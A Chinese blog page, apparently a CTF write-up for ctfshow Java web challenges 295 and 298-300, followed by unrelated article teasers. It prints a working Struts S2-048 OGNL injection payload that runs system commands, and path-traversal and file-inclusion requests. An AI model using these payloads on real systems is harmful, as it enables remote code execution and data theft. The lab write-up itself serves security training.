当前位置：首页 > news >正文

ctfshow web入门 java 295 298-300

news 文章来源：https://blog.csdn.net/m0_64815693/article/details/130026063 2025/5/9 12:48:05

其他没啥好讲的，都是工具就通杀了

web295

漏洞地址 http://ip/S2-048/integration/saveGangster.action

这里我们可以看到他是解析了

尝试使用网上的payload

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

这里我们发现，他是解析了Runtime的，然后我们就可以利用它里面的方法执行命令

//这里我们无论是env，还是cat /proc/self/environ都有报错
payload：%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('env').getInputStream())).(#q)}

但是报错中的这个就是flag

web298

这里给我们了一个jar，打包好了的包，这里我们使用一些反编译工具查看一下

在loginServlet类中，我们看到这里经过这么判断才能获得flag，跟踪一下看看。

这里看到getVipStatus方法，获得了获取flag的条件就是user等于admin，password等于ctfshow

但是题目一进去就一个报错，看这里软件包里面有ctfshow，尝试一下目录ctfshow

得到提示通过login，传参username和password

payload：/ctfshow/login?username=admin&password=ctfshow

web299

查看源代码获得提示，这里可能存在任意文件读取，我们首先查看index.jsp，这里发现存在任意文件读取，这里我们继续读取WEB-INF/web.xml

这里我们看到，这里有一个软件包中有一个GetFlag类，这里我们去读取WEB-INF/classes/com/ctfshow/servlet/GetFlag.class去

虽然很乱，但是在这里发现了flag

payload: /view-source?file=../../../../../../fl3g

web300

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];include($file);
}else{highlight_file(__FILE__);
}

和上面差不多

payload: ?file=../../../../../f1bg

ctfshow web入门 java 295 298-300

其他没啥好讲的，都是工具就通杀了 web295 漏洞地址 http://ip/S2-048/integration/saveGangster.action 这里我们可以看到他是解析了尝试使用网上的payload %{(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#cont…...

编程日记 2023/5/19 6:09:17

SWIG包装器使用指南——（四）C#使用SWIG简介与实践

SWIG系列：http://t.csdn.cn/cIAcr 文章目录一、简介二、全局函数、变量、常量三、继承四、传递指针、引用、数组与值五、基本类型的指针与引用六、基本类型的数组七、基本类型的默认map规则八、常用的typemap方法九、代码插入十、实践10.1 如何映射Foo*&到ref F…...

编程日记 2023/5/25 16:07:08

HashTable, HashMap 和 ConcurrentHashMap

HashTable, HashMap 和 ConcurrentHashMap 都是 Java 集合框架中的类，用于存储和操作键值对。它们之间存在一些关键区别，如下所示： 1.同步性： HashTable：线程安全，所有的方法都是同步的（synchr…...

编程日记 2023/5/18 11:32:44

ToBeWritten之IoT 技战法

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…...

编程日记 2023/5/29 5:59:59

基于ASP.NET开发的医院手术麻醉信息管理系统源码项目源码

系统主要功能介绍： 门诊科室管理系统：手术快速申请、手术申请、手术审核麻醉科管理系统：手术安排、术后处方、术后小结、PCS实施及管理记录、手术流程手术护理系统：手术安排、安排临时手术、添加急诊手术、局麻手术护理、整体护…...

编程日记 2023/5/20 3:08:46

伪加密超具体破解办法，直击原理底层，细致演示！！！

前言： 由于我自己目前在misc和取证工作中，也遇到很多压缩包的问题，我个人非常喜欢做压缩包的题目，但也会遇到伪加密问题难以破解，全网ctf教程我都看完了，但是都觉得不够具体，所以我写一篇博客&…...

编程日记 2023/5/29 6:01:44

ChatGPT大规模封锁亚洲地区账号

我是卢松松，点点上面的头像，欢迎关注我哦！ 在毫无征兆的情况下，从3月31日开始OpenAI大规模封号，而且主要集中在亚洲地区，特别是ip地址在台湾、日本、香港三地的，命中率目测40%。新注册的账号、…...

编程日记 2023/5/30 9:09:36

脂肪酸脂质Myristic acid PEG NHS，Myristic-acid PEG NHS ester，肉豆蔻酸PEG活性酯，具有优异疏水性

一、基础产品数据： 中文名：肉豆蔻酸PEG N-羟基琥珀酰亚胺，肉豆蔻酸PEG活性酯英文名：Myristic acid PEG NHS，Myristic-acid PEG NHS ester，Myristic acid PEG SE 结构式（Structural）…...

编程日记 2023/5/25 16:07:56

MFC - CFormView类学习1

CFormView简介 MFC提供了一个名为CFormView的特殊视图类，我们称其为表单视图。表单视图是指用控件来输入和输出数据的视图，用户可以方便地在表单视图中使用控件。表单视图具有对话框和滚动视图的特性，它使程序看起来象是一个具有滚动条的对话…...

编程日记 2023/5/17 6:32:13

图像预处理方法

图像预处理膨胀腐蚀概述 ⚫ 膨胀、腐蚀属于形态学的操作, 简单来说就是基于形状的一系列图像处理操作 ⚫ 膨胀腐蚀是基于高亮部分(白色)操作的, 膨胀是対高亮部分进行膨胀, 类似“领域扩张”, 腐蚀是高亮部分被腐蚀, 类似“领域被蚕食” ⚫ 膨胀腐蚀的应用和功能: 消除噪声…...

编程日记 2023/5/20 8:26:32

【蓝桥杯C/C++】专题六：动态规划

专题六：动态规划目录专题六：动态规划导读什么是动态规划解决的问题解题步骤动态规划应该如何debug记忆化搜索斐波那契数题目代码题解爬楼梯题目代码题解使用最小花费爬楼梯题目代码题解不同路径题目题解dfsdp凑硬币题目题解dfsdp滑雪题目代码题解汉罗塔…...

编程日记 2023/5/18 5:20:04

图的定义和基本术语

图的定义和基本术语1.图的定义2.图的基本术语3.图的分类1.图的定义图是由顶点和有穷非空集合和顶点边的集合吗，表示为G(V,E)。 G表示一个图，V是图G的顶点（数据元素）的集合，E是图G中顶点之间边的集合。在图中&#xf…...

编程日记 2023/5/28 19:27:43

041：cesium加载Blue Marble地图

第041个点击查看专栏目录本示例的目的是介绍如何在vue+cesium中加载Blue Marble地图。Blue Marble是一个术语，用来描述星球漂浮在浩瀚太空中的形象。早在 1972 年，阿波罗 17 号任务的工作人员就首次捕捉到了地球的标志性卫星图像，并将其称为“Blue Marble”。从那时起，NA…...

编程日记 2023/5/26 20:38:06

【概念梳理】激活函数

一、引言常用的激活函数如下： 1、Sigmoid函数 2、Tanh函数 3、ReLU函数 4、ELU函数 5、PReLU函数 6、Leaky ReLU函数 7、Maxout函数 8、Mish函数二、激活函数的定义多层神经网络中，上层节点的输出和下层节点的输入之间具有一个函数关系，…...

编程日记 2023/5/29 6:02:57

【python】@property 和 @staticmethod

property 和 staticmethod 是 Python 中的两个装饰器，它们分别用于在类中创建属性或静态方法。它们的作用如下： property property：用于将类的一个方法作为属性访问。在 Python 中，使用“getter” 和“setter”方法来实现属性&a…...

编程日记 2023/5/25 16:09:05

Spring题集 - Spring AOP相关面试题总结

文章目录01. Spring AOP 的理解?02. Spring AOP 思想的代码实现03. Spring AOP 的相关术语有哪些？04. Spring AOP 基于注解的切面实现？05. Spring AOP 的通知有哪些类型？06. AOP 有哪些实现方式？07. Spring AOP 和 AspectJ AOP 有…...

编程日记 2023/5/24 2:04:32

分考场

[蓝桥杯 2017 国 C] 分考场(假题：最小色数) 题目描述 nnn 个人参加某项特殊考试。为了公平，要求任何两个认识的人不能分在同一个考场。求最少需要分几个考场才能满足条件。输入格式第一行，一个整数 n(1<n<100)n(1<n<100…...

编程日记 2023/5/30 9:10:50

BI技巧丨DAX Studio

DAX Studio DAX Studio，作为PowerBI外部插件使用率排名第一的插件，相信各位小伙伴或多或少都听说过，那么DAX Studio具体有哪些功能呢？ PS：DAX Studio的下载链接，小伙伴们可以自行搜索，这里就不…...

编程日记 2023/5/21 10:57:00

Java 8常用时间 API

Date: 你不爱我了吗? 🚡本地时间时区相关格式化在Java 8中，Instant类用于表示时间戳，相当于旧的Date类；LocalDateTime类用于表示日期和时间，相当于旧的Calendar类；DateTimeFormatter类用于格式化日期和时间…...

编程日记 2023/5/20 9:17:38

C++运算符

C运算符运算符是一种告诉编译器执行特定的数学或逻辑操作的符号。C 内置了丰富的运算符，并提供了以下类型的运算符： 算术运算符关系运算符逻辑运算符位运算符赋值运算符杂项运算符 1. 算术运算符运算符描述实例把两个操作数相加A B 将得到 30-从第…...

编程日记 2023/5/22 21:00:31

低/无代码赋能企业,IT与业务的角色正在悄然改变

现在这个社会，年轻人的压力是真的大，需要会的技能多到数不清。想学习多点技能也不知道去哪学，主要是网络资源太丰富，很难找到一个适合自己的。那接下来推荐4个大神级别的资源网站你可一定得码住，都是年轻人特别 …...

编程日记 2023/5/22 1:14:21

SpringCloud学习2（Spring Cloud Netflix）负载均衡Ribbon、Feign负载均衡、Hystix服务熔断

文章目录负载均衡RibbonRibbon的作用代码实现生产者cloud1_provider实现配置文件在HiController中编写以下代码启动集群消费者cloud1_consumer实现引入依赖编写配置文件编写启动类，并给RestTemplate配置LoadBalanced注解编写RestController来测试Feign负载均衡简介F…...

编程日记 2023/5/26 20:38:57

Spring 源码解析 - @Async 注解下的循环依赖问题原理

一、Async 注解下的循环依赖问题我们都知道 Spring IOC 单例模式下可以帮助我们解决循环依赖问题，比如下面自己依赖自己循环依赖的场景： Component public class TestAsync {ResourceTestAsync async;public void test() {System.out.println("t…...

编程日记 2023/5/27 14:32:50

8个全球性编程比赛，天才程序员的梦想舞台

很多编程爱好者在学习之初，都渴望与全球的程序员一较高下，以证明自己的实力。一些全球性的编程竞赛为他们提供了这样的机会，不仅可以与全世界的顶尖程序员们交流，还有机会获得丰厚的奖金和进入顶级公司的机会，更重要…...

编程日记 2023/5/26 4:29:28

2023年中国海洋大学计算机及电子信息考研分析

考研时间跨度： 初试时间： 2022年8月23 海大推免及创新人才计划接收通知。 2022年9月13 海大专业目录及人数，包含推免。 2022年10月18 2022年硕士研究生计划 ，不含推免。海大2022年硕士研究生计划网上第一次时间为2022年9月24日…...

编程日记 2023/5/23 11:47:06

【C++笔试强训】第六天

选择题 1. 解析：十进制转换为八进制就是不断的除8，取余数。十进制转换成其他进制的数就是除以进制，取余。解析：注意printf的转换，%%只会打印一个%，所以选A。解析：由于()的原因p先和*结合&…...

编程日记 2023/5/26 20:40:40

Redission 中的 RedLock 原理实现, springboot 你造吗?

分布锁之RedLock 锁住你的心我的爱 🚂为什么需要使用 RedLock锁被误释放时钟不一致问题锁的“延迟释放”而不是死锁Redlock是啥redlock 存在什么问题惊群效应时钟漂移Redisson 实现 RedLock在 Redisson 中, RedLock的实现类是哪一个类?这一招叫抛砖引玉springboot …...

编程日记 2023/5/23 11:47:15

【沐风老师】3dMax一键房屋创建者插件使用方法详解

3dmax一键房屋创建者，一键生成墙体、窗洞和门洞的插件！这个脚本主要用于创建或捕获一些架构项目所代表的平面，这是通过导入它们并在每个所需的层添加值来实现的。传统方法，但是省事儿多了！ 【版本要求】 3dMax 2015及…...

编程日记 2023/5/23 3:32:05

C/C++ 变量详解

文章目录前言一、静态变量与动态变量1. 概念2. 区别3. 使用方法和注意事项3.1 静态变量3.2 动态变量4. 结论二、全局变量与局部变量1. 区别2. 全局变量的使用方法和注意事项3. 局部变量的使用方法和注意事项4. 总结前言对C学习感兴趣的可以看看这篇文章哦：C/C教程…...

编程日记 2023/5/21 13:19:58

新SSD盘安装操作系统启动不了

今天打算给电脑升级下装备，加装一块固态硬盘。电脑原本自带两块硬盘（SSD128GSATA1T），SSD清理了许久还是没空间，于是就买了块1TSSD，打算扩容下。打开电脑后盖傻眼了，没有备用插槽&#xff0c…...

编程日记 2023/5/23 4:49:00

web295

web298

web299

web300

相关文章：